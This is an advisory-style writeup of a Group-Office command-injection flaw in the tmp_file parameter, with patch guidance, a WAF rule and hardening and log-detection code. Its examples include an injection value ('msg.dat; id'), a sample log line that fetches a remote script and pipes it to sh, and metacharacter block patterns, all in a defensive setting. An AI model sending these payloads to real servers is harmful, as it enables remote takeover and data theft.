CVE-2026-25512
📋 TL;DR
This CVE describes a remote code execution vulnerability in Group-Office where an authenticated attacker can execute arbitrary system commands on the server by injecting shell metacharacters into the tmp_file parameter. The vulnerability affects all Group-Office installations prior to patched versions, requiring authentication but allowing complete server compromise.
💻 Affected Systems
- Group-Office, all releases on each branch before the patched versions 6.8.150, 25.0.82 and 26.0.5
📦 What is this software?
Group-Office by Intermesh: open-source, PHP-based groupware (email, calendar, contacts/CRM, file sharing and related modules) deployed as a single web application on a PHP-capable web server.
⚠️ Risk & Real-World Impact
Worst Case
Complete server takeover. Injected commands run as the web server / PHP worker account; root or system privileges follow if that account is privileged or a local privilege escalation is available. From there: data exfiltration, lateral movement to other systems, and installation of a persistent backdoor.
Likely Case
Attacker gains shell access on the web server as the web server account, reads the Group-Office database and mail/CRM data it serves, and potentially compromises the rest of the server environment.
If Mitigated
Limited impact due to proper network segmentation, minimal privileges, and monitoring catching exploitation attempts early.
🎯 Exploit Status
Exploitation requires an authenticated account but is straightforward once authenticated: this is a direct command injection, so no exploit development is needed beyond placing shell metacharacters in the tmp_file parameter.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 6.8.150, 25.0.82, or 26.0.5 depending on your version branch
Vendor Advisory: https://github.com/Intermesh/groupoffice/security/advisories/GHSA-579w-jvg7-frr4
Restart Required: Yes
Instructions:
1. Back up your Group-Office installation and database.
2. Download the patched version from the official repository.
3. Replace the vulnerable files with the patched versions.
4. Restart the web server and Group-Office services.
🔧 Temporary Workarounds
Input Validation Filter
Add input validation that accepts only an allowlisted filename pattern for the tmp_file parameter and rejects everything else (a denylist of shell metacharacters alone is weaker, since newlines and encoded forms are easy to miss).
Modify the email/message/tnefAttachmentFromTempFile endpoint so tmp_file is validated, and confined to the expected temp directory, before it reaches the exec() call; pass the value through escapeshellarg() as a second line of defense.
WAF Rule
Block requests that carry shell metacharacters in the tmp_file parameter.
Add a WAF rule that URL-decodes the request and blocks tmp_file values containing ;, |, &, $, (, ), `, >, < or a newline. Scope the rule to the email/message/tnefAttachmentFromTempFile endpoint to limit false positives, and make sure it inspects POST bodies as well as the query string.
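The contrast the workaround describes, as an added example that is not Group-Office code: the vulnerable pattern (user input concatenated into a shell string) next to the hardened form (allowlist validation, confinement to the temp directory, and argv passed to the process without a shell). The page does not say which binary Group-Office invokes or where its temp files live; the `tnef` command name and `TMP_DIR` are assumptions, and Python stands in for the project's PHP (escapeshellarg() plays the role of `shlex.quote` there).

```python
import re
import shlex
from pathlib import Path

# Assumptions, not taken from the advisory: the decoder binary and temp directory.
TMP_DIR = Path("/tmp/groupoffice-demo")

# Allowlist: a plain filename only. fullmatch (no ^/$) means a trailing newline
# cannot slip past, which "$" in a normal match would allow.
SAFE_NAME = re.compile(r"[A-Za-z0-9._-]{1,128}")


def build_command_unsafe(tmp_file: str) -> str:
    """The vulnerable pattern: attacker-controlled text spliced into a shell
    command line. Returned rather than executed so the injection can be seen."""
    return "tnef -f " + tmp_file


def validate_tmp_file(tmp_file: str, tmp_dir: Path = TMP_DIR) -> Path:
    """Allowlist + path confinement. Raises ValueError on anything suspicious."""
    if not SAFE_NAME.fullmatch(tmp_file):
        raise ValueError("tmp_file contains characters outside the allowlist")
    if tmp_file in (".", ".."):
        raise ValueError("tmp_file must name a file")
    target = (tmp_dir / tmp_file).resolve()
    # resolve() follows symlinks, so compare against the real temp directory.
    if target.parent != tmp_dir.resolve():
        raise ValueError("tmp_file escapes the temp directory")
    return target


def build_argv_safe(tmp_file: str, tmp_dir: Path = TMP_DIR) -> list:
    """Hardened form: the validated path is one argv element. Execute with
    subprocess.run(argv) (never shell=True), so no shell ever parses it."""
    return ["tnef", "-f", str(validate_tmp_file(tmp_file, tmp_dir))]


def quote_for_shell(tmp_file: str, tmp_dir: Path = TMP_DIR) -> str:
    """Defense in depth when a shell string is unavoidable: quote the
    already-validated path (PHP's escapeshellarg() does the same job)."""
    return "tnef -f " + shlex.quote(str(validate_tmp_file(tmp_file, tmp_dir)))


def is_accepted(tmp_file: str) -> bool:
    """Convenience wrapper: does the hardened validator accept this value?"""
    try:
        validate_tmp_file(tmp_file)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    payload = "msg.dat; id"  # constructed injection attempt
    print("unsafe command line :", build_command_unsafe(payload))
    print("hardened accepts it?:", is_accepted(payload))
    print("hardened argv       :", build_argv_safe("msg.dat"))
```

The point of `build_argv_safe` is that rejecting metacharacters is only half the fix: even a filename made entirely of allowed characters must not be able to name a file outside the temp directory, and the command must be executed without a shell so there is nothing left for a metacharacter to influence.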
🧯 If You Can't Patch
- Implement strict network segmentation to isolate the Group-Office server from critical systems
- Run the web server and PHP workers as an unprivileged account with no sudo rights, so a successful injection does not yield root
- Enable detailed logging and monitoring for suspicious command execution from the web server process
🔍 How to Verify
Check if Vulnerable:
Check Group-Office version and compare against vulnerable versions. Examine the email/message/tnefAttachmentFromTempFile endpoint code for unsanitized exec() calls.
Check Version:
Check Group-Office admin panel or examine version files in installation directory
Verify Fix Applied:
Verify the version is 6.8.150, 25.0.82, or 26.0.5 or higher on its branch. On a test instance (not production), confirm that shell metacharacters in the tmp_file parameter no longer execute commands, using a harmless command such as sleep rather than anything destructive.
📡 Detection & Monitoring
Log Indicators:
- Requests to email/message/tnefAttachmentFromTempFile whose tmp_file value contains shell metacharacters in access logs (URL-decode before matching; values sent in a POST body will not appear in standard access logs)
- Child processes spawned by the web server or PHP worker process, visible in auditd execve records or EDR process telemetry rather than in web server logs (exec() calls themselves are not logged by the web server)
- Unexpected system command execution from the web user context
Network Indicators:
- HTTP requests to email/message/tnefAttachmentFromTempFile whose tmp_file parameter contains shell metacharacters, or URL-encoded forms of them
- Outbound connections from web server to unexpected destinations
SIEM Query:
source="web_server_logs" AND (uri="/email/message/tnefAttachmentFromTempFile" AND (param="tmp_file" AND value MATCHES "[;|&$()`<>]"))
(Pseudo-syntax: adapt it to your SIEM's query language, URL-decode the parameter before matching so that encoded forms such as %3B are caught, and remember that parameters sent in a POST body do not appear in access logs.)
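The access-log detection above, written out as a runnable check over constructed log lines (an added example, not part of the advisory or of any Group-Office tooling). It decodes the request before matching, flags tmp_file values carrying shell metacharacters, and separately flags POST requests to the endpoint whose parameters are not visible in the log. The `index.php?r=...` routing form in the sample lines and the client addresses are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint name taken from the advisory; the rest of the URL shape is assumed.
ENDPOINT = "email/message/tnefAttachmentFromTempFile"

# Shell metacharacters from the advisory's WAF rule, plus newline.
META = re.compile(r"[;|&$()`<>\n]")

# Apache/nginx combined log format:
# client ident user [time] "METHOD URI PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3}) '
)

# Constructed sample lines: benign call, injection attempt, unrelated endpoint
# with a metacharacter (must not fire), and a POST whose body is not logged.
LOG_LINES = [
    '10.0.0.5 - - [12/Mar/2026:10:01:02 +0000] "GET /index.php?r=email/message/'
    'tnefAttachmentFromTempFile&tmp_file=msg.dat HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [12/Mar/2026:10:01:09 +0000] "GET /index.php?r=email/message/'
    'tnefAttachmentFromTempFile&tmp_file=msg.dat%3Bcurl%20http%3A%2F%2F198.51.100.7'
    '%2Fx%7Csh HTTP/1.1" 200 44 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2026:10:02:00 +0000] "GET /index.php?r=calendar/event/load'
    '&tmp_file=a%3Bb HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [12/Mar/2026:10:03:00 +0000] "POST /index.php?r=email/message/'
    'tnefAttachmentFromTempFile HTTP/1.1" 200 44 "-" "Mozilla/5.0"',
]


def check_line(line: str):
    """Return a finding dict for a suspicious request to the endpoint, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    uri = m.group("uri")
    # Decode the whole URI first so an encoded path (email%2Fmessage%2F...) still matches.
    if ENDPOINT not in unquote(uri):
        return None
    params = parse_qs(urlsplit(uri).query, keep_blank_values=True)  # decodes %XX
    for value in params.get("tmp_file", []):
        if META.search(value):
            return {"ip": m.group("ip"), "ts": m.group("ts"),
                    "reason": "metacharacter-in-tmp_file", "tmp_file": value}
    if m.group("method") == "POST" and "tmp_file" not in params:
        # The parameter travelled in the body, which access logs do not record.
        return {"ip": m.group("ip"), "ts": m.group("ts"),
                "reason": "post-body-not-logged", "tmp_file": None}
    return None


def scan(lines):
    """Run check_line over a log and return every finding."""
    return [f for f in (check_line(l) for l in lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(LOG_LINES):
        print(finding)
```

The second finding kind is the honest part of this check: an access log can prove a request reached the endpoint but cannot show what was in a POST body, so those hits need to be correlated with process telemetry (a shell or curl spawned by the PHP worker) or with a WAF that logs request bodies.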